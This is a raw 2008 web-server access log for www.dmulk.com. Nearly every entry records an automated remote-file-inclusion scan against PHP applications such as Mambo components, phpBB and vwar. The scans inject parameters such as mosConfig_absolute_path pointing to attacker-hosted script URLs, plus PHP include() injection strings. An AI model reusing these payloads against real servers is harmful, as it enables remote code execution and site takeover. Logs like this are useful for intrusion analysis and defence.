70.88.226.121 - - [08/Jun/2008:10:55:21 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:55:25 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:55:25 -0700] "GET /logs/config.php?path_to_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [08/Jun/2008:10:55:30 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.88.226.121 - - [08/Jun/2008:10:55:43 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:10:55:48 -0700] "GET /logs/access_080129.log/?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:55:57 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:56:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:10:56:18 -0700] "GET /logs/access_071225.log//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:10:56:19 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:10:56:43 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.98.71 - - [08/Jun/2008:10:56:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [08/Jun/2008:10:56:48 -0700] "GET //skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:10:57:38 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:10:57:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [08/Jun/2008:10:57:41 -0700] "GET //skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:10:58:13 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:10:58:34 -0700] "GET /logs/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:10:58:46 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:10:58:46 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:10:58:46 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:10:59:12 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:10:59:17 -0700] "GET /index.php?redir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 200 16865 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:10:59:18 -0700] "GET /logs/index.php?redir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:10:59:23 -0700] "GET /logs/access_080312.log/index.php?redir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:10:59:25 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:10:59:26 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:10:59:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
194.165.49.171 - - [08/Jun/2008:10:59:30 -0700] "GET /logs/access_080429.log//vwar/includes/functions_gb_admin.php?vwar_root=http://scc-team.co.cc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:10:59:56 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:10:59:57 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:10:59:57 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:00:12 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:00:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:00:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:11:00:17 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:11:00:18 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:11:00:18 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:00:25 -0700] "GET /logs/access_080311.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:00:25 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:00:26 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:00:28 -0700] "GET /logs/access_080312.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.188.110.128 - - [08/Jun/2008:11:00:28 -0700] "GET /mambelfish.class.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:00:33 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:00:43 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:00:43 -0700] "GET //skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:00:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:00:46 -0700] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:00:46 -0700] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:00:58 -0700] "GET /logs/index.php?option=com_acctexp&Itemid=&mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../test2.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:00:59 -0700] "GET /index.php?option=com_acctexp&Itemid=&mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../test2.txt? HTTP/1.1" 200 16949 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:01:10 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:01:10 -0700] "GET //skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:01:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:01:16 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:01:17 -0700] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 200 16909 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [08/Jun/2008:11:01:18 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.141.48.154 - - [08/Jun/2008:11:01:22 -0700] "GET /logs/access.log//citywriter/head.php?path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.48.154 - - [08/Jun/2008:11:01:23 -0700] "GET //citywriter/head.php?path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.48.154 - - [08/Jun/2008:11:01:23 -0700] "GET /logs//citywriter/head.php?path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
130.242.82.146 - - [08/Jun/2008:11:01:31 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://bjork.name.md/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:11:01:47 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.linknetcrew.com/code/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
130.242.82.146 - - [08/Jun/2008:11:01:50 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.it-history.net/cgi/idscan3?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.79.168.66 - - [08/Jun/2008:11:02:05 -0700] "GET /viewtopic.php?p=15&highlight=%2527.include($_GET[file]),exit.%2527&file=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:02:20 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:02:29 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:02:30 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:02:30 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.59.184.132 - - [08/Jun/2008:11:02:31 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.patrioticusa.us/poll/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.20.64.34 - - [08/Jun/2008:11:02:43 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.20.64.34 - - [08/Jun/2008:11:02:43 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.20.64.34 - - [08/Jun/2008:11:02:43 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:11:03:30 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:11:03:31 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.22.102 - - [08/Jun/2008:11:03:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.186 - - [08/Jun/2008:11:03:40 -0700] "GET /logs/access.log HTTP/1.0" 200 341254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:11:03:51 -0700] "GET /logs/access_080106.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:04:39 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:04:39 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:04:39 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:04:54 -0700] "GET /logs/access_080312.log//config.php?path[docroot]=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:04:54 -0700] "GET //config.php?path[docroot]=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:04:54 -0700] "GET /logs//config.php?path[docroot]=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.89.25.154 - - [08/Jun/2008:11:05:10 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:05:17 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:05:21 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:11:05:29 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:06:21 -0700] "GET /logs/access_080312.log//config.php?path[docroot]=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:06:21 -0700] "GET //config.php?path[docroot]=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:06:23 -0700] "GET /logs//config.php?path[docroot]=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:06:33 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:06:34 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:06:35 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:06:38 -0700] "GET /logs/access_080216.log//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:06:40 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:06:42 -0700] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:07:05 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:07:05 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.138.2 - - [08/Jun/2008:11:07:05 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://predator.110mb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:11:07:34 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.142.215.151 - - [08/Jun/2008:11:07:39 -0700] "GET /index2.php?DoAction=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.188.110.128 - - [08/Jun/2008:11:07:43 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:11:08:25 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:11:08:25 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:11:08:25 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:08:32 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:08:37 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:11:08:40 -0700] "GET /logs/?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 200 50988 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:11:08:52 -0700] "GET /?mosConfig_absolute_path=http://www.emilylamont.com/components/includes/id.txt??? HTTP/1.1" 200 16891 "-" "libwww-perl/5.79" "www.dmulk.com"
77.87.191.61 - - [08/Jun/2008:11:08:53 -0700] "GET //22_ultimate/templates/header.php?mainpath=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.205.17 - - [08/Jun/2008:11:08:56 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://3oliver.com/dev/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.48.154 - - [08/Jun/2008:11:08:59 -0700] "GET //citywriter/head.php?path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
